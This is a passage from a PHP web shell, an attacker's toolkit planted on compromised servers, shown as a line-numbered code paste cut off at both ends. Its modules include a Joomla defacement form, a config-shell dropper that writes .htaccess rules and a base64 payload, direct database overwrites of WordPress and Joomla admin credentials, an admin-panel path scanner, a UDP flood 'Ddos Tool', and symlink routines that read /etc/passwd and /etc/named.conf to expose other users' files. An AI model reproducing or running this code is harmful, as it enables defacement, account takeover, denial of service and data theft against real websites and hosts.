  2765. while ($i <= 7) {
  2766. $num = rand() % 33;
  2767. $tmp = substr($chars, $num, 1);
  2768. $pass = $pass . $tmp;
  2769. $i++;
  2770. }
  2771.  
  2772. return $pass;
  2773.  
  2774. }
  2775.  
  2776. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
  2777.  
  2778. {
  2779.  
  2780. $ar0=explode($marqueurDebutLien, $text);
  2781. $ar1=explode($marqueurFinLien, $ar0[$i]);
  2782. $ar=trim($ar1[0]);
  2783. return $ar;
  2784. }
  2785.  
  2786. }?>
  2787. <center><br><br>
  2788. <font color="#FFFFFF" size='+3'><b>+--=[ Automatic Joomla Index Changer ]=--+</b></font><br><br>
  2789. </center>
  2790. <center><b>
  2791. Link of symlink configuration.php of Joomla<br></b>
  2792. <FORM action="" method="post">
  2793. <input type="hidden" name="form_action" value="1">
  2794. <input type="text" class="inputz" size="60" name="file" value="http://site.com/sym/home/user/public_html/configuration.php">
  2795. <br>
  2796. <br><b>
  2797. Admin Control panel url</b><br>
  2798. <input type="text" class="inputz" size="40" name="site_url" value="http://site/administrator"><br>
  2799. <br><b>
  2800. Your Index Code</b>
  2801. <br>
  2802. <TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code
  2803. </TEXTAREA>
  2804. <br>
  2805. <INPUT class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">
  2806. </FORM>
  2807. </center>
  2808. <script language=JavaScript>m='%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>
  2809. <?php
  2810. }
  2811. ///////////////////////////////////////////////////////////////////////////
  2812.  
  2813.  
  2814. ///////////////////////////////////////////////////////////////////////////
  2815.  
  2816. elseif(isset($_GET['x']) && ($_GET['x'] == 'config'))
  2817. {
  2818. ?>
  2819. <form action="?y=<?php echo $pwd; ?>&amp;x=config" method="post">
  2820.  
  2821. <?php
  2822.  
  2823. echo "<center/><br/><b><font color=#FFFFFF>+--==[ Config Shell Priv8 SCR ]==--+</font></b><br><br>";
  2824.  
  2825. mkdir('config', 0755);
  2826. chdir('config');
  2827. $kokdosya = ".htaccess";
  2828. $dosya_adi = "$kokdosya";
  2829. $dosya = fopen ($dosya_adi , 'w') or die ("Error cuyy!");
  2830. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  2831.  
  2832. AddType application/x-httpd-cgi .cpc
  2833.  
  2834. AddHandler cgi-script .izo
  2835. AddHandler cgi-script .izo";
  2836. fwrite ( $dosya , $metin ) ;
  2837. fclose ($dosya);
  2838.  
  2839. $file = fopen("config.izo" ,"w+");
  2840. $write = fwrite ($file ,base64_decode($configshell));
  2841. fclose($file);
  2842. chmod("config.izo",0755);
  2843. echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>
  2844. </div>";
  2845. }
  2846. /////////////////////////////////////////////////////////////////////////
  2847.  
  2848.  
  2849. ///////////////////////////////////////////////////////////////////////////
  2850. elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset'))
  2851. {
  2852. ?>
  2853. <form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">
  2854.  
  2855. <?php
  2856.  
  2857. echo "<center/><br/><b><font color=#FFFFFF>+--==[ Wordpress Reset Password ]==--+</font></b><br><br>";
  2858.  
  2859. if(empty($_POST['pwd'])){
  2860.  
  2861. echo "<FORM method='POST'>
  2862. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>
  2863. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  2864. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  2865. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  2866. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
  2867. <tr><td>&nbsp;&nbsp;User baru</td><td>
  2868. <input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
  2869. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  2870. <input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;
  2871.  
  2872. <input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
  2873. </td></tr> </table><br><br><br><br>
  2874. ";
  2875. }else{
  2876. $localhost = $_POST['localhost'];
  2877. $database = $_POST['database'];
  2878. $username = $_POST['username'];
  2879. $password = $_POST['password'];
  2880. $pwd = $_POST['pwd'];
  2881. $admin = $_POST['admin'];
  2882.  
  2883.  
  2884. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2885. @mysql_select_db($database) or die(mysql_error());
  2886.  
  2887. $hash = crypt($pwd);
  2888. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  2889. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  2890. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  2891. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  2892. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  2893. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
  2894. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  2895.  
  2896.  
  2897. if($a4s){
  2898. echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
  2899. }
  2900.  
  2901. }
  2902.  
  2903.  
  2904. echo "
  2905. </div>"; }
  2906.  
  2907. elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset'))
  2908. {
  2909. ?>
  2910. <form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">
  2911.  
  2912. <?php
  2913.  
  2914. echo "<center/><br/><b><font color=#FFFFFF>+--==[ Joomla Reset Password ]==--+</font></b><br><br>";
  2915. if(empty($_POST['pwd'])){
  2916. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  2917. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  2918. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  2919. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  2920. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
  2921. <tr><td>&nbsp;&nbsp;User baru</td><td>
  2922. <input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
  2923. <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 =
  2924. <input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;
  2925.  
  2926. <input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
  2927. </td></tr> </table><br><br><br><br>
  2928. ";
  2929. }else{
  2930. $localhost = $_POST['localhost'];
  2931. $database = $_POST['database'];
  2932. $username = $_POST['username'];
  2933. $password = $_POST['password'];
  2934. $pwd = $_POST['pwd'];
  2935. $admin = $_POST['admin'];
  2936. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2937. @mysql_select_db($database) or die(mysql_error());
  2938. $hash = crypt($pwd);
  2939. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  2940. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  2941. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  2942. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  2943. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  2944. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  2945. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  2946. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  2947. if($SQL){
  2948. echo "<b>Success : skarang password barunya >>> - (123456)";
  2949. }
  2950. }
  2951.  
  2952. echo "
  2953. </div>";
  2954. }
  2955. //////////////////////////////////////////////////////////////////////////////
  2956.  
  2957. elseif(isset($_GET['x']) && ($_GET['x'] == 'adfin'))
  2958. {
  2959. ?>
  2960. <form action="?y=<?php echo $pwd; ?>&amp;x=adfin" method="post">
  2961.  
  2962. <?php
  2963. set_time_limit(0);
  2964. error_reporting(0);
  2965. $list['front'] ="admin
  2966. adm
  2967. admincp
  2968. admcp
  2969. cp
  2970. modcp
  2971. moderatorcp
  2972. adminare
  2973. admins
  2974. cpanel
  2975. controlpanel";
  2976. $list['end'] = "admin1.php
  2977. admin1.html
  2978. admin2.php
  2979. admin2.html
  2980. yonetim.php
  2981. yonetim.html
  2982. yonetici.php
  2983. yonetici.html
  2984. ccms/
  2985. ccms/login.php
  2986. ccms/index.php
  2987. maintenance/
  2988. webmaster/
  2989. adm/
  2990. configuration/
  2991. configure/
  2992. websvn/
  2993. admin/
  2994. admin/account.php
  2995. admin/account.html
  2996. admin/index.php
  2997. admin/index.html
  2998. admin/login.php
  2999. admin/login.html
  3000. admin/home.php
  3001. admin/controlpanel.html
  3002. admin/controlpanel.php
  3003. admin.php
  3004. admin.html
  3005. admin/cp.php
  3006. admin/cp.html
  3007. cp.php
  3008. cp.html
  3009. administrator/
  3010. administrator/index.html
  3011. administrator/index.php
  3012. administrator/login.html
  3013. administrator/login.php
  3014. administrator/account.html
  3015. administrator/account.php
  3016. administrator.php
  3017. administrator.html
  3018. login.php
  3019. login.html
  3020. modelsearch/login.php
  3021. moderator.php
  3022. moderator.html
  3023. moderator/login.php
  3024. moderator/login.html
  3025. moderator/admin.php
  3026. moderator/admin.html
  3027. moderator/
  3028. account.php
  3029. account.html
  3030. controlpanel/
  3031. controlpanel.php
  3032. controlpanel.html
  3033. admincontrol.php
  3034. admincontrol.html
  3035. adminpanel.php
  3036. adminpanel.html
  3037. admin1.asp
  3038. admin2.asp
  3039. yonetim.asp
  3040. yonetici.asp
  3041. admin/account.asp
  3042. admin/index.asp
  3043. admin/login.asp
  3044. admin/home.asp
  3045. admin/controlpanel.asp
  3046. admin.asp
  3047. admin/cp.asp
  3048. cp.asp
  3049. administrator/index.asp
  3050. administrator/login.asp
  3051. administrator/account.asp
  3052. administrator.asp
  3053. login.asp
  3054. modelsearch/login.asp
  3055. moderator.asp
  3056. moderator/login.asp
  3057. moderator/admin.asp
  3058. account.asp
  3059. controlpanel.asp
  3060. admincontrol.asp
  3061. adminpanel.asp
  3062. fileadmin/
  3063. fileadmin.php
  3064. fileadmin.asp
  3065. fileadmin.html
  3066. administration/
  3067. administration.php
  3068. administration.html
  3069. sysadmin.php
  3070. sysadmin.html
  3071. phpmyadmin/
  3072. myadmin/
  3073. sysadmin.asp
  3074. sysadmin/
  3075. ur-admin.asp
  3076. ur-admin.php
  3077. ur-admin.html
  3078. ur-admin/
  3079. Server.php
  3080. Server.html
  3081. Server.asp
  3082. Server/
  3083. wp-admin/
  3084. administr8.php
  3085. administr8.html
  3086. administr8/
  3087. administr8.asp
  3088. webadmin/
  3089. webadmin.php
  3090. webadmin.asp
  3091. webadmin.html
  3092. administratie/
  3093. admins/
  3094. admins.php
  3095. admins.asp
  3096. admins.html
  3097. administrivia/
  3098. Database_Administration/
  3099. WebAdmin/
  3100. useradmin/
  3101. sysadmins/
  3102. admin1/
  3103. system-administration/
  3104. administrators/
  3105. pgadmin/
  3106. directadmin/
  3107. staradmin/
  3108. ServerAdministrator/
  3109. SysAdmin/
  3110. administer/
  3111. LiveUser_Admin/
  3112. sys-admin/
  3113. typo3/
  3114. panel/
  3115. cpanel/
  3116. cPanel/
  3117. cpanel_file/
  3118. platz_login/
  3119. rcLogin/
  3120. blogindex/
  3121. formslogin/
  3122. autologin/
  3123. support_login/
  3124. meta_login/
  3125. manuallogin/
  3126. simpleLogin/
  3127. loginflat/
  3128. utility_login/
  3129. showlogin/
  3130. memlogin/
  3131. members/
  3132. login-redirect/
  3133. sub-login/
  3134. wp-login/
  3135. login1/
  3136. dir-login/
  3137. login_db/
  3138. xlogin/
  3139. smblogin/
  3140. customer_login/
  3141. UserLogin/
  3142. login-us/
  3143. acct_login/
  3144. admin_area/
  3145. bigadmin/
  3146. project-admins/
  3147. phppgadmin/
  3148. pureadmin/
  3149. sql-admin/
  3150. radmind/
  3151. openvpnadmin/
  3152. wizmysqladmin/
  3153. vadmind/
  3154. ezsqliteadmin/
  3155. hpwebjetadmin/
  3156. newsadmin/
  3157. adminpro/
  3158. Lotus_Domino_Admin/
  3159. bbadmin/
  3160. vmailadmin/
  3161. Indy_admin/
  3162. ccp14admin/
  3163. irc-macadmin/
  3164. banneradmin/
  3165. sshadmin/
  3166. phpldapadmin/
  3167. macadmin/
  3168. administratoraccounts/
  3169. admin4_account/
  3170. admin4_colon/
  3171. radmind-1/
  3172. Super-Admin/
  3173. AdminTools/
  3174. cmsadmin/
  3175. SysAdmin2/
  3176. globes_admin/
  3177. cadmins/
  3178. phpSQLiteAdmin/
  3179. navSiteAdmin/
  3180. server_admin_small/
  3181. logo_sysadmin/
  3182. server/
  3183. database_administration/
  3184. power_user/
  3185. system_administration/
  3186. ss_vms_admin_sm/
  3187. adminarea/
  3188. bb-admin/
  3189. adminLogin/
  3190. panel-administracion/
  3191. instadmin/
  3192. memberadmin/
  3193. administratorlogin/
  3194. admin/admin.php
  3195. admin_area/admin.php
  3196. admin_area/login.php
  3197. siteadmin/login.php
  3198. siteadmin/index.php
  3199. siteadmin/login.html
  3200. admin/admin.html
  3201. admin_area/index.php
  3202. bb-admin/index.php
  3203. bb-admin/login.php
  3204. bb-admin/admin.php
  3205. admin_area/login.html
  3206. admin_area/index.html
  3207. admincp/index.asp
  3208. admincp/login.asp
  3209. admincp/index.html
  3210. webadmin/index.html
  3211. webadmin/admin.html
  3212. webadmin/login.html
  3213. admin/admin_login.html
  3214. admin_login.html
  3215. panel-administracion/login.html
  3216. nsw/admin/login.php
  3217. webadmin/login.php
  3218. admin/admin_login.php
  3219. admin_login.php
  3220. admin_area/admin.html
  3221. pages/admin/admin-login.php
  3222. admin/admin-login.php
  3223. admin-login.php
  3224. bb-admin/index.html
  3225. bb-admin/login.html
  3226. bb-admin/admin.html
  3227. admin/home.html
  3228. pages/admin/admin-login.html
  3229. admin/admin-login.html
  3230. admin-login.html
  3231. admin/adminLogin.html
  3232. adminLogin.html
  3233. home.html
  3234. rcjakar/admin/login.php
  3235. adminarea/index.html
  3236. adminarea/admin.html
  3237. webadmin/index.php
  3238. webadmin/admin.php
  3239. user.html
  3240. modelsearch/login.html
  3241. adminarea/login.html
  3242. panel-administracion/index.html
  3243. panel-administracion/admin.html
  3244. modelsearch/index.html
  3245. modelsearch/admin.html
  3246. admincontrol/login.html
  3247. adm/index.html
  3248. adm.html
  3249. user.php
  3250. panel-administracion/login.php
  3251. wp-login.php
  3252. adminLogin.php
  3253. admin/adminLogin.php
  3254. home.php
  3255. adminarea/index.php
  3256. adminarea/admin.php
  3257. adminarea/login.php
  3258. panel-administracion/index.php
  3259. panel-administracion/admin.php
  3260. modelsearch/index.php
  3261. modelsearch/admin.php
  3262. admincontrol/login.php
  3263. adm/admloginuser.php
  3264. admloginuser.php
  3265. admin2/login.php
  3266. admin2/index.php
  3267. adm/index.php
  3268. adm.php
  3269. affiliate.php
  3270. adm_auth.php
  3271. memberadmin.php
  3272. administratorlogin.php
  3273. admin/admin.asp
  3274. admin_area/admin.asp
  3275. admin_area/login.asp
  3276. admin_area/index.asp
  3277. bb-admin/index.asp
  3278. bb-admin/login.asp
  3279. bb-admin/admin.asp
  3280. pages/admin/admin-login.asp
  3281. admin/admin-login.asp
  3282. admin-login.asp
  3283. user.asp
  3284. webadmin/index.asp
  3285. webadmin/admin.asp
  3286. webadmin/login.asp
  3287. admin/admin_login.asp
  3288. admin_login.asp
  3289. panel-administracion/login.asp
  3290. adminLogin.asp
  3291. admin/adminLogin.asp
  3292. home.asp
  3293. adminarea/index.asp
  3294. adminarea/admin.asp
  3295. adminarea/login.asp
  3296. panel-administracion/index.asp
  3297. panel-administracion/admin.asp
  3298. modelsearch/index.asp
  3299. modelsearch/admin.asp
  3300. admincontrol/login.asp
  3301. adm/admloginuser.asp
  3302. admloginuser.asp
  3303. admin2/login.asp
  3304. admin2/index.asp
  3305. adm/index.asp
  3306. adm.asp
  3307. affiliate.asp
  3308. adm_auth.asp
  3309. memberadmin.asp
  3310. administratorlogin.asp
  3311. siteadmin/login.asp
  3312. siteadmin/index.asp
  3313. ADMIN/
  3314. paneldecontrol/
  3315. login/
  3316. cms/
  3317. admon/
  3318. ADMON/
  3319. administrador/
  3320. ADMIN/login.php
  3321. panelc/
  3322. ADMIN/login.html";
  3323. function template() {
  3324. echo '
  3325.  
  3326. <script type="text/javascript">
  3327. <!--
  3328. function insertcode($text, $place, $replace)
  3329. {
  3330. var $this = $text;
  3331. var logbox = document.getElementById($place);
  3332. if($replace == 0)
  3333. document.getElementById($place).innerHTML = logbox.innerHTML+$this;
  3334. else
  3335. document.getElementById($place).innerHTML = $this;
  3336. //document.getElementById("helpbox").innerHTML = $this;
  3337. }
  3338. -->
  3339. </script>
  3340. <br>
  3341. <br>
  3342. <h1 class="technique-two">
  3343.  
  3344.  
  3345.  
  3346. </h1>
  3347.  
  3348. <div class="wrapper">
  3349. <div class="red">
  3350. <div class="tube">
  3351. <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
  3352. <form action="" method="post" name="xploit_form">
  3353.  
  3354. <tr>
  3355. <tr>
  3356. <b><td>URL</td>
  3357. <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
  3358. </td>
  3359. </tr><tr>
  3360. <td>404 string</td>
  3361. <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
  3362. </td></b>
  3363. </tr><br><td>
  3364. <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
  3365. </span></td></tr>
  3366. </form></td></tr>
  3367. <br /></table>
  3368. </div> <!-- /tube -->
  3369. </div> <!-- /red -->
  3370. <br />
  3371. <div class="green">
  3372. <div class="tube" id="rightcol">
  3373. Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
  3374. <b>Found ones:<br /></b>
  3375. </div> <!-- /tube -->
  3376. </div></center><!-- /green -->
  3377. <br clear="all" /><br />
  3378. <div class="blue">
  3379. <div class="tube" id="logbox">
  3380. <br />
  3381. <br />
  3382. Admin page Finder :<br /><br />
  3383. </div> <!-- /tube -->
  3384. </div> <!-- /blue -->
  3385. </div> <!-- /wrapper -->
  3386. <br clear="all"><br>';
  3387. }
  3388. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
  3389. if($br == 1) $msg .= "<br />";
  3390. echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
  3391. if($stop == 1) exit;
  3392. @flush();@ob_flush();
  3393. }
  3394. function check($x, $front=0) {
  3395. global $_POST,$site,$false;
  3396. if($front == 0) $t = $site.$x;
  3397. else $t = 'http://'.$x.'.'.$site.'/';
  3398. $headers = get_headers($t);
  3399. if (!eregi('200', $headers[0])) return 0;
  3400. $data = @file_get_contents($t);
  3401. if($_POST['xploit_404string'] == "") if($data == $false) return 0;
  3402. if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
  3403. return 1;
  3404. }
  3405.  
  3406. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  3407. template();
  3408. if(!isset($_POST['xploit_url'])) die;
  3409. if($_POST['xploit_url'] == '') die;
  3410. $site = $_POST['xploit_url'];
  3411. if ($site[strlen($site)-1] != "/") $site .= "/";
  3412. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
  3413. $list['end'] = str_replace("\r", "", $list['end']);
  3414. $list['front'] = str_replace("\r", "", $list['front']);
  3415. $pathes = explode("\n", $list['end']);
  3416. $frontpathes = explode("\n", $list['front']);
  3417. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
  3418. $verificate = 0;
  3419. foreach($pathes as $path) {
  3420. show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
  3421. $verificate++; show($verificate, 0, 0, 'verified', 1);
  3422. if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
  3423. else{
  3424. show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  3425. show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
  3426. }
  3427. }
  3428. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
  3429. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
  3430. foreach($frontpathes as $frontpath) {
  3431. show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
  3432. $verificate++; show($verificate, 0, 0, 'verified', 1);
  3433. if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
  3434. else{
  3435. show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  3436. show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
  3437. }
  3438.  
  3439. }
  3440. }
  3441. //////////////////////////////////////////////////////////////////////////////
  3442.  
  3443. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  3444. {
  3445. ?>
  3446. <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  3447. <center><br><br><br>
  3448. Your IP: <font color="red"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don't DoS yourself nub)<br><br>
  3449. <table class="tabnet" style="width:333px;padding:0 1px;">
  3450. <th colspan="5">Ddos Tool</th>
  3451. <tr><tr><td>IP Target</td><td>:</td>
  3452. <td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
  3453. </td></tr>
  3454. <tr><td>Time</td><td>:</td>
  3455. <td><input type="text" class="inputz" name="time" size="48" maxlength="25" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
  3456. </td></tr>
  3457.  
  3458. <tr><td>Port</td><td>:</td>
  3459. <td><input type="text" class="inputz" name="port" size="48" maxlength="5" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
  3460. </td></tr></tr></table></b><br>
  3461. <input type="submit" class="inputzbut" name="fire" value=" Firee !!! ">
  3462. <br><br>
  3463. <center>
  3464. After initiating the DoS attack, please wait while the browser loads.
  3465. </center>
  3466.  
  3467. </form>
  3468. </center>
  3469. <?php
  3470. $submit = $_POST['fire'];
  3471. if (isset($submit)) {
  3472.  
  3473. $packets = 0;
  3474. $ip = $_POST['ip'];
  3475. $rand = $_POST['port'];
  3476. set_time_limit(0);
  3477. ignore_user_abort(FALSE);
  3478.  
  3479. $exec_time = $_POST['time'];
  3480.  
  3481. $time = time();
  3482. print "Flooded: $ip on port $rand <br><br>";
  3483. $max_time = $time+$exec_time;
  3484.  
  3485.  
  3486.  
  3487. for($i=0;$i<65535;$i++){
  3488. $out .= "X";
  3489. }
  3490. while(1){
  3491. $packets++;
  3492. if(time() > $max_time){
  3493. break;
  3494. }
  3495.  
  3496. $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  3497. if($fp){
  3498. fwrite($fp, $out);
  3499. fclose($fp);
  3500. }
  3501. }
  3502. echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
  3503. }
  3504. }
  3505.  
  3506. elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink')){
  3507. $d0mains = @file("/etc/named.conf");
  3508. ##httaces
  3509. if($d0mains){
  3510. @mkdir("rabsym",0777);
  3511. @chdir("rabsym");
  3512. @exe("ln -s / root");
  3513. $file3 = 'Options all
  3514. DirectoryIndex Sux.html
  3515. AddType text/plain .php
  3516. AddHandler server-parsed .php
  3517. AddType text/plain .html
  3518. AddHandler txt .html
  3519. Require None
  3520. Satisfy Any';
  3521.  
  3522. $fp3 = fopen('.htaccess','w');
  3523. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3524. echo "<br><br><br><br><br><center><h2>Symlink Server !</h2></center><br><br>
  3525. <table align=center border=1 style='width:60%;border-color:#333333;'>
  3526. <tr>
  3527. <td align=center><font size=3>S. No.</font></td>
  3528. <td align=center><font size=3>Domains</font></td>
  3529. <td align=center><font size=3>Users</font></td>
  3530. <td align=center><font size=3>Symlink</font></td>
  3531. </tr>";
  3532. $dcount = 1;
  3533. foreach($d0mains as $d0main){
  3534. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  3535. flush();
  3536. if(strlen(trim($domains[1][0])) > 2){
  3537. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  3538. echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
  3539. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  3540. <td>".$user['name']."</td>
  3541. <td><a href='/rabsym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  3542. flush();
  3543. $dcount++;}}}
  3544. echo "</table>";
  3545. }else{
  3546. $TEST=@file('/etc/passwd');
  3547. if ($TEST){
  3548. @mkdir("k2",0777);
  3549. @chdir("k2");
  3550. exe("ln -s / root");
  3551. $file3 = 'Options all
  3552. DirectoryIndex Sux.html
  3553. AddType text/plain .php
  3554. AddHandler server-parsed .php
  3555. AddType text/plain .html
  3556. AddHandler txt .html
  3557. Require None
  3558. Satisfy Any';
  3559. $fp3 = fopen('.htaccess','w');
  3560. $fw3 = fwrite($fp3,$file3);
  3561. @fclose($fp3);
  3562. echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
  3563. <table align=center border=1><tr>
  3564. <td align=center><font size=4>S. No.</font></td>
  3565. <td align=center><font size=4>Users</font></td>
  3566. <td align=center><font size=4>Symlink</font></td></tr>";
  3567. $dcount = 1;
  3568. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  3569. while(!feof($file)){
  3570. $s = fgets($file);
  3571. $matches = array();
  3572. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  3573. $matches = str_replace("home/","",$matches[1]);
  3574. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3575. continue;
  3576. echo "<tr><td align=center><font size=3>" . $dcount . "</td>
  3577. <td align=center><font class=txt>" . $matches . "</td>";
  3578. echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3579. $dcount++;}fclose($file);
  3580. echo "</table>";}else{if($os != "ydows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
  3581. DirectoryIndex Sux.html
  3582. AddType text/plain .php
  3583. AddHandler server-parsed .php
  3584. AddType text/plain .html
  3585. AddHandler txt .html
  3586. Require None
  3587. Satisfy Any';
  3588. $fp3 = fopen('.htaccess','w');
  3589. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3590. echo "<center> <br><br><br><b><span class='b7'>O=:[ Symlink</span> <span class='b8'>Server ! ]:=O</span></b>
  3591. </center><br><br><center>
  3592. <div class='mybox'><h2 class='k2ll33d2'>Server Symlinker</h2>
  3593. <table align=center border=1><tr>
  3594. <td align=center><font size=4>id</font></td>
  3595. <td align=center><font size=4>Users</font></td>
  3596. <td align=center><font size=4>Symlink</font></td></tr>";
  3597. $temp = "";$val1 = 0;$val2 = 1000;
  3598. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  3599. if ($uid)$temp .= join(':',$uid)."\n";}
  3600. echo '<br/>';$temp = trim($temp);$file5 =
  3601. fopen("test.txt","w");
  3602. fputs($file5,$temp);
  3603. fclose($file5);$dcount = 1;$file =
  3604. fopen("test.txt", "r") or exit("Unable to open file!");
  3605. while(!feof($file)){$s = fgets($file);$matches = array();
  3606. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
